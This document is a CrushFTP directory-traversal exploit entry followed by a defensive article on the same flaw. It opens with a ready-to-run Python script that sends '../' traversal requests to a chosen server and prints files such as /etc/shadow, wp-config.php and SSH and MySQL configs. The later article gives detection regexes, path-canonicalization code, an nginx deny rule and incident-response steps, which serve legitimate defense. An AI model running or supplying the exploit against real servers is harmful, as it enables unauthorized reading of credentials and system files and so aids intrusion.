CrushFTP < 11.1.0 - Directory Traversal
## Exploit Title: CrushFTP Directory Traversal
## Google Dork: N/A
# Date: 2024-04-30
# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
## Vendor Homepage: https://www.crushftp.com/
## Software Link: https://www.crushftp.com/download/
## Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x)
## Tested on: Windows10
import requests
import re
# Regular expression to validate the URL
def is_valid_url(url):
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:A-Z0-9?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4
r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6
r'(?::\d+)?' # optional: port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
return re.match(regex, url) is not None
# Function to scan for the vulnerability
def scan_for_vulnerability(url, target_files):
print("Scanning for vulnerability in the following files:")
for target_file in target_files:
print(target_file)
for target_file in target_files:
try:
response = requests.get(url + "?/../../../../../../../../../../" + target_file, timeout=10)
if response.status_code == 200 and target_file.split('/')[-1] in response.text:
print("vulnerability detected in file", target_file)
print("Content of file", target_file, ":")
print(response.text)
else:
print("vulnerability not detected or unexpected response for file", target_file)
except requests.exceptions.RequestException as e:
print("Error connecting to the server:", e)
# User input
input_url = input("Enter the URL of the CrushFTP server: ")
# Validate the URL
if is_valid_url(input_url):
# Expanded list of allowed files
target_files = [
"/var/www/html/index.php",
"/var/www/html/wp-config.php",
"/etc/passwd",
"/etc/shadow",
"/etc/hosts",
"/etc/ssh/sshd_config",
"/etc/mysql/my.cnf",
# Add more files as needed
]
# Start the scan
scan_for_vulnerability(input_url, target_files)
else:
print("Invalid URL entered. Please enter a valid URL.")CrushFTP Directory Traversal Vulnerability (affected versions < 11.1.0)
This article explains the directory traversal vulnerability affecting CrushFTP releases prior to 11.1.0 (and certain legacy 9.x / older 10.x builds). It covers what directory traversal is, the likely impact for affected deployments, safe detection and containment recommendations, and practical defensive code and configuration patterns to reduce exposure. The focus is on remediation, detection, and secure coding patterns rather than on exploit details.
Background: what is directory traversal?
Directory traversal (aka path traversal) occurs when a web or file server accepts an input path and allows callers to break out of an intended base directory—typically by using sequences that move "up" the directory tree—so an attacker can access files outside the intended scope.
When a file-transfer or web administration component fails to correctly validate or canonicalize requested paths, attackers may read sensitive files (configuration files, credentials, SSH keys), leak system information, and in some scenarios combine disclosures with other flaws to escalate compromise.
Affected versions and vendor guidance
| Vendor | Product | Affected versions | Patched version / Guidance |
|---|---|---|---|
| CrushFTP | CrushFTP server | Legacy 9.x and certain builds prior to 10.7.1 and 11.1.0 | Upgrade to 11.1.0 or later (apply vendor patch / advisory) |
Always consult the official CrushFTP download and advisory pages for specific build notes before applying any upgrade in production. If you manage CrushFTP instances, prioritize patching exposed instances and follow vendor mitigation guidance.
Impact & risk assessment
- Confidential data exposure: attackers may obtain configuration files, credentials, or keys stored on disk.
- Account compromise: disclosure of configuration or credential files can lead to account takeover or lateral movement.
- Regulatory and operational impact: leaked customer data or operational secrets may trigger compliance incidents.
- Chaining with other vulnerabilities: directory reads can enable privilege escalation or remote code execution when paired with other flaws.
Safe detection and investigative guidance
Do not attempt unauthorised testing against third-party or internet-facing servers. Only test systems you own or have explicit written permission to test. Use isolated lab environments that mirror production for proof-of-concept and detection tuning.
Detection approaches include:
- Log analysis for suspicious request URIs that attempt to escape the expected file root (including percent-encoded variants).
- Host-based monitoring for unexpected file access patterns (e.g., reads of /etc, /root, or application config files).
- Network-level WAF or IPS signatures matching attempted path-manipulation patterns.
- Authorized vulnerability scans from a controlled environment—use scanners set to non-destructive or informational modes and get permission first.
Example: defensive log-scanning snippet (safe, detection-only)
import re
# Sample regex to find likely path traversal attempts in web logs.
# This is for detection only; it looks for sequences that try to move up directories
# or their simple percent-encoded equivalents.
pattern = re.compile(r'(\.\./|\.\.\\|%2e%2e|%2e/|%2e%5c)', re.IGNORECASE)
def find_suspicious_entries(log_lines):
suspicious = []
for line in log_lines:
if pattern.search(line):
suspicious.append(line)
return suspicious
Explanation: The snippet defines a detection regular expression searching for patterns commonly used in traversal attempts (literal "../", backslash variants, and simple percent-encoded forms). It scans log lines and returns entries matching those patterns. This is a defensive tool for analysts to flag suspicious requests; tune the regex to your log format and test in a lab before production use.
Defensive coding: canonicalization and base-directory checks
Server-side code that serves files must always resolve a requested path to an absolute canonical path and verify it resides within an allowed base directory. Below is a safe pattern in Python that demonstrates canonicalization and an allowlist check.
import os
def is_safe_resolved_path(requested_path, base_dir):
"""
Resolve the requested_path relative to base_dir and ensure the
resulting real path is inside base_dir. Returns True if safe.
"""
base_real = os.path.realpath(base_dir)
# Join then resolve to avoid bypass via absolute path in requested_path.
candidate = os.path.realpath(os.path.join(base_real, requested_path))
try:
# commonpath is robust across platforms; compare canonicalized forms.
return os.path.commonpath([base_real, candidate]) == base_real
except ValueError:
# Path components reside on different drives (Windows) or other issues.
return False
# Usage example (defensive): only open files after is_safe_resolved_path() returns True.
Explanation: This function prevents path traversal by resolving both the base directory and the requested path to their real (canonical) locations, then verifying that the candidate path is beneath the base directory. It avoids relying on simple substring checks and correctly handles symlinks. Use similar logic in the language used by your server stack.
Configuration-level defenses
- Upgrade: apply the vendor patch or upgrade to the fixed CrushFTP release as the primary remediation.
- Network access controls: restrict management and admin interfaces to internal networks, VPNs, or specific IPs.
- Least privilege: run CrushFTP with an account that has only the minimum filesystem permissions required; avoid running services as root/Administrator.
- WAF/IP blocking: deploy WAF rules to block obvious traversal patterns at the perimeter (test rules to reduce false positives).
- Monitoring & alerting: create alerts for access to sensitive files (configuration files, keys) and for anomalous request patterns.
Example: simple nginx rule to reduce basic traversal attempts
# Defensive WAF-like check for basic traversal sequences (tune and test first).
# Place inside your server {} block in nginx.conf
if ($request_uri ~* "\.\./") {
return 403;
}
Explanation: This configuration denies requests containing a basic "../" sequence. It is a coarse measure and must be tuned—attackers can obfuscate payloads using encodings or alternate encodings, so this is not a substitute for server-side canonicalization and patching. Test to avoid blocking legitimate encoded URIs.
Incident response and containment
- If you suspect compromise, isolate the affected host from the network to prevent exfiltration or lateral movement.
- Collect volatile and persistent logs, filesystem snapshots, and memory images for forensic analysis before making changes.
- Rotate credentials and secrets that may have been exposed (API keys, service account credentials, SSH keys), and revoke any suspect tokens.
- Restore from known-good backups where appropriate, and re-image hosts if integrity cannot be guaranteed.
- Reach out to the vendor for guidance and to report any exploitation or weakness discovered in your environment.
Responsible testing and disclosure
Only perform active tests against systems you own or for which you have explicit authorization. If you discover a vulnerability in CrushFTP or any other vendor product, follow responsible disclosure practices: notify the vendor with reproducible details, give them time to patch, and coordinate any public disclosure.
Summary: prioritize patching and layered defenses
Directory traversal bugs are dangerous because they often expose sensitive files without needing elevated privileges. For CrushFTP users, the secure course is to apply the vendor-supplied fixes (upgrade to the patched versions), restrict access to management interfaces, and ensure server-side canonicalization and least-privilege filesystem policies are in place. Detection and monitoring will help identify attempted abuse, but prevention (patching and robust input validation) is the first line of defense.